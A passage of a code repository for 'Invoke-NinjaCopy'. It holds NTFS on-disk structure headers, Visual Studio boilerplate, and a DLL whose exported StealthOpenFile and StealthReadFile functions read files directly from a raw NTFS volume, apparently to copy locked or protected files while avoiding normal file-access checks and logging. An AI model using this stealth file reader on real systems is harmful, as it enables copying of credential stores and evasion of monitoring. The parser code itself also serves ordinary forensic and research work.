226 | WORD RecordSize; // Record length
227 | BYTE NameLength; // Name length in characters
228 | BYTE NameOffset; // Name offset
229 | ULONGLONG StartVCN; // Start VCN
230 | ULONGLONG BaseRef; // Base file reference to the attribute
231 | WORD AttrId; // Attribute Id
232 | } ATTR_ATTRIBUTE_LIST;
233 |
234 | // Attribute: FILE_NAME
235 |
236 | #define ATTR_FILENAME_FLAG_READONLY 0x00000001
237 | #define ATTR_FILENAME_FLAG_HIDDEN 0x00000002
238 | #define ATTR_FILENAME_FLAG_SYSTEM 0x00000004
239 | #define ATTR_FILENAME_FLAG_ARCHIVE 0x00000020
240 | #define ATTR_FILENAME_FLAG_DEVICE 0x00000040
241 | #define ATTR_FILENAME_FLAG_NORMAL 0x00000080
242 | #define ATTR_FILENAME_FLAG_TEMP 0x00000100
243 | #define ATTR_FILENAME_FLAG_SPARSE 0x00000200
244 | #define ATTR_FILENAME_FLAG_REPARSE 0x00000400
245 | #define ATTR_FILENAME_FLAG_COMPRESSED 0x00000800
246 | #define ATTR_FILENAME_FLAG_OFFLINE 0x00001000
247 | #define ATTR_FILENAME_FLAG_NCI 0x00002000
248 | #define ATTR_FILENAME_FLAG_ENCRYPTED 0x00004000
249 | #define ATTR_FILENAME_FLAG_DIRECTORY 0x10000000
250 | #define ATTR_FILENAME_FLAG_INDEXVIEW 0x20000000
251 |
252 | #define ATTR_FILENAME_NAMESPACE_POSIX 0x00
253 | #define ATTR_FILENAME_NAMESPACE_WIN32 0x01
254 | #define ATTR_FILENAME_NAMESPACE_DOS 0x02
255 |
256 | typedef struct tagATTR_FILE_NAME
257 | {
258 | ULONGLONG ParentRef; // File reference to the parent directory
259 | ULONGLONG CreateTime; // File creation time
260 | ULONGLONG AlterTime; // File altered time
261 | ULONGLONG MFTTime; // MFT changed time
262 | ULONGLONG ReadTime; // File read time
263 | ULONGLONG AllocSize; // Allocated size of the file
264 | ULONGLONG RealSize; // Real size of the file
265 | DWORD Flags; // Flags
266 | DWORD ER; // Used by EAs and Reparse
267 | BYTE NameLength; // Filename length in characters
268 | BYTE NameSpace; // Filename space
269 | WORD Name[1]; // Filename
270 | } ATTR_FILE_NAME;
271 |
272 |
273 | // Attribute: VOLUME_INFORMATION
274 |
275 | #define ATTR_VOLINFO_FLAG_DIRTY 0x0001 // Dirty
276 | #define ATTR_VOLINFO_FLAG_RLF 0x0002 // Resize logfile
277 | #define ATTR_VOLINFO_FLAG_UOM 0x0004 // Upgrade on mount
278 | #define ATTR_VOLINFO_FLAG_MONT 0x0008 // Mounted on NT4
279 | #define ATTR_VOLINFO_FLAG_DUSN 0x0010 // Delete USN underway
280 | #define ATTR_VOLINFO_FLAG_ROI 0x0020 // Repair object Ids
281 | #define ATTR_VOLINFO_FLAG_MBC 0x8000 // Modified by chkdsk
282 |
283 | typedef struct tagATTR_VOLUME_INFORMATION
284 | {
285 | BYTE Reserved1[8]; // Always 0 ?
286 | BYTE MajorVersion; // Major version
287 | BYTE MinorVersion; // Minor version
288 | WORD Flags; // Flags
289 | BYTE Reserved2[4]; // Always 0 ?
290 | } ATTR_VOLUME_INFORMATION;
291 |
292 |
293 | // Attribute: INDEX_ROOT
294 | /******************************
295 | INDEX_ROOT
296 | ---------------------
297 | | Index Root Header |
298 | ---------------------
299 | | Index Header |
300 | ---------------------
301 | | Index Entry |
302 | ---------------------
303 | | Index Entry |
304 | ---------------------
305 | | ...... |
306 | ---------------------
307 | *******************************/
308 |
309 | #define ATTR_INDEXROOT_FLAG_SMALL 0x00 // Fits in Index Root File Record
310 | #define ATTR_INDEXROOT_FLAG_LARGE 0x01 // Index Allocation and Bitmap needed
311 |
312 | typedef struct tagATTR_INDEX_ROOT
313 | {
314 | // Index Root Header
315 | DWORD AttrType; // Attribute type (ATTR_TYPE_FILE_NAME: Directory, 0: Index View)
316 | DWORD CollRule; // Collation rule
317 | DWORD IBSize; // Size of index block
318 | BYTE ClustersPerIB; // Clusters per index block (same as BPB?)
319 | BYTE Padding1[3]; // Padding
320 | // Index Header
321 | DWORD EntryOffset; // Offset to the first index entry, relative to this address(0x10)
322 | DWORD TotalEntrySize; // Total size of the index entries
323 | DWORD AllocEntrySize; // Allocated size of the index entries
324 | BYTE Flags; // Flags
325 | BYTE Padding2[3]; // Padding
326 | } ATTR_INDEX_ROOT;
327 |
328 |
329 | // INDEX ENTRY
330 |
331 | #define INDEX_ENTRY_FLAG_SUBNODE 0x01 // Index entry points to a sub-node
332 | #define INDEX_ENTRY_FLAG_LAST 0x02 // Last index entry in the node, no Stream
333 |
334 | typedef struct tagINDEX_ENTRY
335 | {
336 | ULONGLONG FileReference; // Low 6B: MFT record index, High 2B: MFT record sequence number
337 | WORD Size; // Length of the index entry
338 | WORD StreamSize; // Length of the stream
339 | BYTE Flags; // Flags
340 | BYTE Padding[3]; // Padding
341 | BYTE Stream[1]; // Stream
342 | // VCN of the sub node in Index Allocation, Offset = Size - 8
343 | } INDEX_ENTRY;
344 |
345 |
346 | // INDEX BLOCK
347 | /******************************
348 | INDEX_BLOCK
349 | -----------------------
350 | | Index Block Header |
351 | -----------------------
352 | | Index Header |
353 | -----------------------
354 | | Index Entry |
355 | -----------------------
356 | | Index Entry |
357 | -----------------------
358 | | ...... |
359 | -----------------------
360 | *******************************/
361 |
362 | #define INDEX_BLOCK_MAGIC 'XDNI'
363 |
364 | typedef struct tagINDEX_BLOCK
365 | {
366 | // Index Block Header
367 | DWORD Magic; // "INDX"
368 | WORD OffsetOfUS; // Offset of Update Sequence
369 | WORD SizeOfUS; // Size in words of Update Sequence Number & Array
370 | ULONGLONG LSN; // $LogFile Sequence Number
371 | ULONGLONG VCN; // VCN of this index block in the index allocation
372 | // Index Header
373 | DWORD EntryOffset; // Offset of the index entries, relative to this address(0x18)
374 | DWORD TotalEntrySize; // Total size of the index entries
375 | DWORD AllocEntrySize; // Allocated size of index entries
376 | BYTE NotLeaf; // 1 if not leaf node (has children)
377 | BYTE Padding[3]; // Padding
378 | } INDEX_BLOCK;
379 |
380 | #endif
381 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : NTFSParser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParser application.
9 |
10 |
11 | NTFSParser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 | // TODO: reference additional headers your program requires here
18 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFSParserDLL.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_DataType.h"
21 |
22 | using namespace std;
23 |
24 | struct FileInfo_t
25 | {
26 | CNTFSVolume* volume;
27 | CFileRecord* fileRecord;
28 | CIndexEntry* indexEntry;
29 | CAttrBase* data;
30 | };
31 |
32 | extern "C" HANDLE __declspec(dllexport) StealthOpenFile(char* filePathCStr)
33 | {
34 | FileInfo_t* fileInfo = new FileInfo_t;
35 |
36 | string filePath = string(filePathCStr);
37 | _TCHAR volumeName = filePath.at(0);
38 |
39 | fileInfo->volume = new CNTFSVolume(volumeName);
40 | if (!fileInfo->volume->IsVolumeOK())
41 | {
42 | return NULL;
43 | }
44 |
45 | //Parse root directory
46 | fileInfo->fileRecord = new CFileRecord(fileInfo->volume);
47 | fileInfo->fileRecord->SetAttrMask(MASK_INDEX_ROOT | MASK_INDEX_ALLOCATION);
48 |
49 | if (!fileInfo->fileRecord->ParseFileRecord(MFT_IDX_ROOT))
50 | {
51 | return NULL;
52 | }
53 | if (!fileInfo->fileRecord->ParseAttrs())
54 | {
55 | return NULL;
56 | }
57 |
58 | //Find subdirectory
59 | fileInfo->indexEntry = new CIndexEntry;
60 | int dirs = filePath.find(_T('\\'), 0);
61 | int dire = filePath.find(_T('\\'), dirs+1);
62 |
63 | while (dire != string::npos)
64 | {
65 | string pathname = filePath.substr(dirs+1, dire-dirs-1);
66 | const _TCHAR* pathnameCStr = (const _TCHAR*)pathname.c_str();
67 | if (fileInfo->fileRecord->FindSubEntry(pathnameCStr, *(fileInfo->indexEntry)))
68 | {
69 | if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))
70 | {
71 | return NULL;
72 | }
73 |
74 | if (!fileInfo->fileRecord->ParseAttrs())
75 | {
76 | if (fileInfo->fileRecord->IsCompressed())
77 | {
78 | return NULL;
79 | }
80 | else if (fileInfo->fileRecord->IsEncrypted())
81 | {
82 | return NULL;
83 | }
84 | else
85 | {
86 | return NULL;
87 | }
88 | }
89 | }
90 | else
91 | {
92 | return NULL;
93 | }
94 |
95 |
96 | dirs = dire;
97 | dire = filePath.find(_T('\\'), dirs+1);
98 | }
99 |
100 | string fileName = filePath.substr(dirs+1, filePath.size()-1);
101 | const _TCHAR* fileNameCStr = (const _TCHAR*)fileName.c_str();
102 | if (fileInfo->fileRecord->FindSubEntry(fileNameCStr, *(fileInfo->indexEntry)))
103 | {
104 | if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))
105 | {
106 | return NULL;
107 | }
108 |
109 | fileInfo->fileRecord->SetAttrMask(MASK_DATA);
110 | if (!fileInfo->fileRecord->ParseAttrs())
111 | {
112 | return NULL;
113 | }
114 |
115 | fileInfo->data = (CAttrBase*)fileInfo->fileRecord->FindStream();
116 |
117 | return fileInfo;
118 | }
119 |
120 | return NULL;
121 | }
122 |
123 |
124 | extern "C" DWORD __declspec(dllexport) StealthReadFile(FileInfo_t* fileInfo, BYTE* buffer, DWORD bufferSize, ULONGLONG offset, DWORD* bytesRead, ULONGLONG* dataRemaining)
125 | {
126 |
127 | if (fileInfo->data)
128 | {
129 | ULONGLONG dataLength = (ULONGLONG)fileInfo->data->GetDataSize();
130 | ULONGLONG fullDataLength = dataLength;
131 |
132 | dataLength = dataLength - offset;
133 | if (dataLength > bufferSize)
134 | {
135 | dataLength = bufferSize;
136 | }
137 | if (dataLength > MAXUINT32)
138 | {
139 | return 1;
140 | }
141 |
142 | DWORD len;
143 | if (fileInfo->data->ReadData(offset, buffer, dataLength, &len) && len == dataLength)
144 | {
145 | *bytesRead = len;
146 | *dataRemaining = fullDataLength - len - offset;
147 | return 0; //Success
148 | }
149 | return 3;
150 | }
151 | return 2;
152 | }
153 |
154 |
155 | extern "C" void __declspec(dllexport) StealthCloseFile(FileInfo_t* fileInfo)
156 | {
157 | delete (fileInfo->data);
158 | delete (fileInfo->indexEntry);
159 | delete (fileInfo->volume);
160 | delete fileInfo;
161 | }
162 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}
23 | Win32Proj
24 | NTFSParserDLL
25 |
26 |
27 |
28 | DynamicLibrary
29 | true
30 | v110
31 | NotSet
32 |
33 |
34 | DynamicLibrary
35 | true
36 | v110
37 | NotSet
38 |
39 |
40 | DynamicLibrary
41 | false
42 | v110_xp
43 | true
44 | NotSet
45 |
46 |
47 | DynamicLibrary
48 | false
49 | v110_xp
50 | true
51 | NotSet
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)
87 |
88 |
89 | Windows
90 | true
91 |
92 |
93 |
94 |
95 | Use
96 | Level3
97 | Disabled
98 | WIN32;_DEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)
99 |
100 |
101 | Windows
102 | true
103 |
104 |
105 |
106 |
107 | Level3
108 | Use
109 | MaxSpeed
110 | true
111 | true
112 | WIN32;NDEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)
113 | MultiThreaded
114 |
115 |
116 | Windows
117 | true
118 | true
119 | true
120 |
121 |
122 |
123 |
124 | Level3
125 | Use
126 | MaxSpeed
127 | true
128 | true
129 | WIN32;NDEBUG;_WINDOWS;_USRDLL;NTFSPARSERDLL_EXPORTS;%(PreprocessorDefinitions)
130 | MultiThreaded
131 |
132 |
133 | Windows
134 | true
135 | true
136 | true
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 | false
149 | false
150 |
151 |
152 |
153 |
154 | false
155 | false
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 | Create
164 | Create
165 | Create
166 | Create
167 |
168 |
169 |
170 |
171 |
172 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFS_Common.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS Class common definitions
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_COMMON_H_CYB70289
18 | #define __NTFS_COMMON_H_CYB70289
19 |
20 | #include
21 | #include
22 | #include
23 | #include
24 |
25 | #include "NTFS_DataType.h"
26 |
27 | #define ATTR_NUMS 16 // Attribute Types count
28 | #define ATTR_INDEX(at) (((at)>>4)-1) // Attribute Type to Index, eg. 0x10->0, 0x30->2
29 | #define ATTR_MASK(at) (((DWORD)1)<
77 | struct NTSLIST_ENTRY
78 | {
79 | NTSLIST_ENTRY *Next;
80 | ENTRY_TYPE *Entry;
81 | };
82 |
83 | // List Entry Smart Pointer
84 | template
85 | class CEntrySmartPtr
86 | {
87 | public:
88 | CEntrySmartPtr(ENTRY_TYPE *ptr = NULL)
89 | {
90 | EntryPtr = ptr;
91 | }
92 |
93 | virtual ~CEntrySmartPtr()
94 | {
95 | if (EntryPtr)
96 | delete EntryPtr;
97 | }
98 |
99 | private:
100 | const ENTRY_TYPE *EntryPtr;
101 |
102 | public:
103 | __inline CEntrySmartPtr operator = (const ENTRY_TYPE* ptr)
104 | {
105 | // Delete previous pointer if allocated
106 | if (EntryPtr)
107 | delete EntryPtr;
108 |
109 | EntryPtr = ptr;
110 |
111 | return *this;
112 | }
113 |
114 | __inline const ENTRY_TYPE* operator->() const
115 | {
116 | _ASSERT(EntryPtr);
117 | return EntryPtr;
118 | }
119 |
120 | __inline BOOL IsValid() const
121 | {
122 | return EntryPtr != NULL;
123 | }
124 | };
125 |
126 | //////////////////////////////////////
127 | // Single list implementation
128 | //////////////////////////////////////
129 | template
130 | class CSList
131 | {
132 | public:
133 | CSList()
134 | {
135 | ListHead = ListTail = NULL;
136 | ListCurrent = NULL;
137 | EntryCount = 0;
138 | }
139 |
140 | virtual ~CSList()
141 | {
142 | RemoveAll();
143 | }
144 |
145 | private:
146 | int EntryCount;
147 | NTSLIST_ENTRY *ListHead;
148 | NTSLIST_ENTRY *ListTail;
149 | NTSLIST_ENTRY *ListCurrent;
150 |
151 | public:
152 | // Get entry count
153 | __inline int GetCount() const
154 | {
155 | return EntryCount;
156 | }
157 |
158 | // Insert to tail
159 | BOOL InsertEntry(ENTRY_TYPE *entry)
160 | {
161 | NTSLIST_ENTRY *le = new NTSLIST_ENTRY;
162 | if (!le)
163 | return FALSE;
164 |
165 | le->Entry = entry;
166 | le->Next = NULL;
167 |
168 | if (ListTail == NULL)
169 | ListHead = le; // Empty list
170 | else
171 | ListTail->Next = le;
172 |
173 | ListTail = le;
174 |
175 | EntryCount++;
176 | return TRUE;
177 | }
178 |
179 | // Remove all entries
180 | void RemoveAll()
181 | {
182 | while (ListHead)
183 | {
184 | ListCurrent = ListHead->Next;
185 | delete ListHead->Entry;
186 | delete ListHead;
187 |
188 | ListHead = ListCurrent;
189 | }
190 |
191 | ListHead = ListTail = NULL;
192 | ListCurrent = NULL;
193 | EntryCount = 0;
194 | }
195 |
196 | // Find first entry
197 | __inline ENTRY_TYPE *FindFirstEntry() const
198 | {
199 | ((CSList*)this)->ListCurrent = ListHead;
200 |
201 | if (ListCurrent)
202 | return ListCurrent->Entry;
203 | else
204 | return NULL;
205 | }
206 |
207 | // Find next entry
208 | __inline ENTRY_TYPE *FindNextEntry() const
209 | {
210 | if (ListCurrent)
211 | ((CSList*)this)->ListCurrent = ListCurrent->Next;
212 |
213 | if (ListCurrent)
214 | return ListCurrent->Entry;
215 | else
216 | return NULL;
217 | }
218 |
219 | // Throw all entries
220 | // Caution! All entries are just thrown without free
221 | __inline void ThrowAll()
222 | {
223 | ListHead = ListTail = NULL;
224 | ListCurrent = NULL;
225 | EntryCount = 0;
226 | }
227 | }; //CSList
228 |
229 |
230 | //////////////////////////////////////
231 | // Stack implementation
232 | //////////////////////////////////////
233 | template
234 | class CStack
235 | {
236 | public:
237 | CStack()
238 | {
239 | ListHead = ListTail = NULL;
240 | EntryCount = 0;
241 | }
242 |
243 | virtual ~CStack()
244 | {
245 | RemoveAll();
246 | }
247 |
248 | private:
249 | int EntryCount;
250 | NTSLIST_ENTRY *ListHead;
251 | NTSLIST_ENTRY *ListTail;
252 |
253 | public:
254 | // Get entry count
255 | __inline int GetCount() const
256 | {
257 | return EntryCount;
258 | }
259 |
260 | // Insert to head
261 | BOOL Push(ENTRY_TYPE *entry)
262 | {
263 | NTSLIST_ENTRY *le = new NTSLIST_ENTRY;
264 | if (!le)
265 | return FALSE;
266 |
267 | le->Entry = entry;
268 | le->Next = ListHead;
269 |
270 | ListHead = le;
271 |
272 | if (ListTail == NULL)
273 | ListTail = le; // Empty list
274 |
275 | EntryCount ++;
276 | return TRUE;
277 | }
278 |
279 | // Remove from head
280 | ENTRY_TYPE* Pop()
281 | {
282 | if (ListHead == NULL)
283 | return NULL;
284 |
285 | NTSLIST_ENTRY *le = ListHead;
286 | ENTRY_TYPE *e = le->Entry;
287 |
288 | if (ListTail == ListHead)
289 | ListTail = ListHead->Next;
290 | ListHead = ListHead->Next;
291 |
292 | delete le;
293 | EntryCount --;
294 |
295 | return e;
296 | }
297 |
298 | // Remove all entries
299 | void RemoveAll()
300 | {
301 | NTSLIST_ENTRY *le;
302 |
303 | while (ListHead)
304 | {
305 | le = ListHead->Next;
306 | delete ListHead->Entry;
307 | delete ListHead;
308 |
309 | ListHead = le;
310 | }
311 |
312 | ListHead = ListTail = NULL;
313 | EntryCount = 0;
314 | }
315 | }; //CStack
316 |
317 | #endif
318 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParserDLL/NTFS_DataType.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS data structures and definitions
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_DATATYPE_H_CYB70289
18 | #define __NTFS_DATATYPE_H_CYB70289
19 |
20 | // NTFS Boot Sector BPB
21 |
22 | #define NTFS_SIGNATURE "NTFS "
23 |
24 | #pragma pack(1)
25 | typedef struct tagNTFS_BPB
26 | {
27 | // jump instruction
28 | BYTE Jmp[3];
29 |
30 | // signature
31 | BYTE Signature[8];
32 |
33 | // BPB and extended BPB
34 | WORD BytesPerSector;
35 | BYTE SectorsPerCluster;
36 | WORD ReservedSectors;
37 | BYTE Zeros1[3];
38 | WORD NotUsed1;
39 | BYTE MediaDescriptor;
40 | WORD Zeros2;
41 | WORD SectorsPerTrack;
42 | WORD NumberOfHeads;
43 | DWORD HiddenSectors;
44 | DWORD NotUsed2;
45 | DWORD NotUsed3;
46 | ULONGLONG TotalSectors;
47 | ULONGLONG LCN_MFT;
48 | ULONGLONG LCN_MFTMirr;
49 | DWORD ClustersPerFileRecord;
50 | DWORD ClustersPerIndexBlock;
51 | BYTE VolumeSN[8];
52 |
53 | // boot code
54 | BYTE Code[430];
55 |
56 | //0xAA55
57 | BYTE _AA;
58 | BYTE _55;
59 | } NTFS_BPB;
60 | #pragma pack()
61 |
62 |
63 | // MFT Indexes
64 | #define MFT_IDX_MFT 0
65 | #define MFT_IDX_MFT_MIRR 1
66 | #define MFT_IDX_LOG_FILE 2
67 | #define MFT_IDX_VOLUME 3
68 | #define MFT_IDX_ATTR_DEF 4
69 | #define MFT_IDX_ROOT 5
70 | #define MFT_IDX_BITMAP 6
71 | #define MFT_IDX_BOOT 7
72 | #define MFT_IDX_BAD_CLUSTER 8
73 | #define MFT_IDX_SECURE 9
74 | #define MFT_IDX_UPCASE 10
75 | #define MFT_IDX_EXTEND 11
76 | #define MFT_IDX_RESERVED12 12
77 | #define MFT_IDX_RESERVED13 13
78 | #define MFT_IDX_RESERVED14 14
79 | #define MFT_IDX_RESERVED15 15
80 | #define MFT_IDX_USER 16
81 |
82 |
83 | /******************************
84 | File Record
85 | ---------------------
86 | | File Record Header|
87 | ---------------------
88 | | Attribute 1 |
89 | ---------------------
90 | | Attribute 2 |
91 | ---------------------
92 | | ...... |
93 | ---------------------
94 | | 0xFFFFFFFF |
95 | ---------------------
96 | *******************************/
97 |
98 | // File Record Header
99 |
100 | #define FILE_RECORD_MAGIC 'ELIF'
101 | #define FILE_RECORD_FLAG_INUSE 0x01 // File record is in use
102 | #define FILE_RECORD_FLAG_DIR 0x02 // File record is a directory
103 |
104 | typedef struct tagFILE_RECORD_HEADER
105 | {
106 | DWORD Magic; // "FILE"
107 | WORD OffsetOfUS; // Offset of Update Sequence
108 | WORD SizeOfUS; // Size in words of Update Sequence Number & Array
109 | ULONGLONG LSN; // $LogFile Sequence Number
110 | WORD SeqNo; // Sequence number
111 | WORD Hardlinks; // Hard link count
112 | WORD OffsetOfAttr; // Offset of the first Attribute
113 | WORD Flags; // Flags
114 | DWORD RealSize; // Real size of the FILE record
115 | DWORD AllocSize; // Allocated size of the FILE record
116 | ULONGLONG RefToBase; // File reference to the base FILE record
117 | WORD NextAttrId; // Next Attribute Id
118 | WORD Align; // Align to 4 byte boundary
119 | DWORD RecordNo; // Number of this MFT Record
120 | } FILE_RECORD_HEADER;
121 |
122 |
123 | /******************************
124 | Attribute
125 | --------------------
126 | | Attribute Header |
127 | --------------------
128 | | Attribute Data |
129 | --------------------
130 | *******************************/
131 |
132 | // Attribute Header
133 |
134 | #define ATTR_TYPE_STANDARD_INFORMATION 0x10
135 | #define ATTR_TYPE_ATTRIBUTE_LIST 0x20
136 | #define ATTR_TYPE_FILE_NAME 0x30
137 | #define ATTR_TYPE_OBJECT_ID 0x40
138 | #define ATTR_TYPE_SECURITY_DESCRIPTOR 0x50
139 | #define ATTR_TYPE_VOLUME_NAME 0x60
140 | #define ATTR_TYPE_VOLUME_INFORMATION 0x70
141 | #define ATTR_TYPE_DATA 0x80
142 | #define ATTR_TYPE_INDEX_ROOT 0x90
143 | #define ATTR_TYPE_INDEX_ALLOCATION 0xA0
144 | #define ATTR_TYPE_BITMAP 0xB0
145 | #define ATTR_TYPE_REPARSE_POINT 0xC0
146 | #define ATTR_TYPE_EA_INFORMATION 0xD0
147 | #define ATTR_TYPE_EA 0xE0
148 | #define ATTR_TYPE_LOGGED_UTILITY_STREAM 0x100
149 |
150 | #define ATTR_FLAG_COMPRESSED 0x0001
151 | #define ATTR_FLAG_ENCRYPTED 0x4000
152 | #define ATTR_FLAG_SPARSE 0x8000
153 |
154 | typedef struct tagATTR_HEADER_COMMON
155 | {
156 | DWORD Type; // Attribute Type
157 | DWORD TotalSize; // Length (including this header)
158 | BYTE NonResident; // 0 - resident, 1 - non resident
159 | BYTE NameLength; // name length in words
160 | WORD NameOffset; // offset to the name
161 | WORD Flags; // Flags
162 | WORD Id; // Attribute Id
163 | } ATTR_HEADER_COMMON;
164 |
165 | typedef struct tagATTR_HEADER_RESIDENT
166 | {
167 | ATTR_HEADER_COMMON Header; // Common data structure
168 | DWORD AttrSize; // Length of the attribute body
169 | WORD AttrOffset; // Offset to the Attribute
170 | BYTE IndexedFlag; // Indexed flag
171 | BYTE Padding; // Padding
172 | } ATTR_HEADER_RESIDENT;
173 |
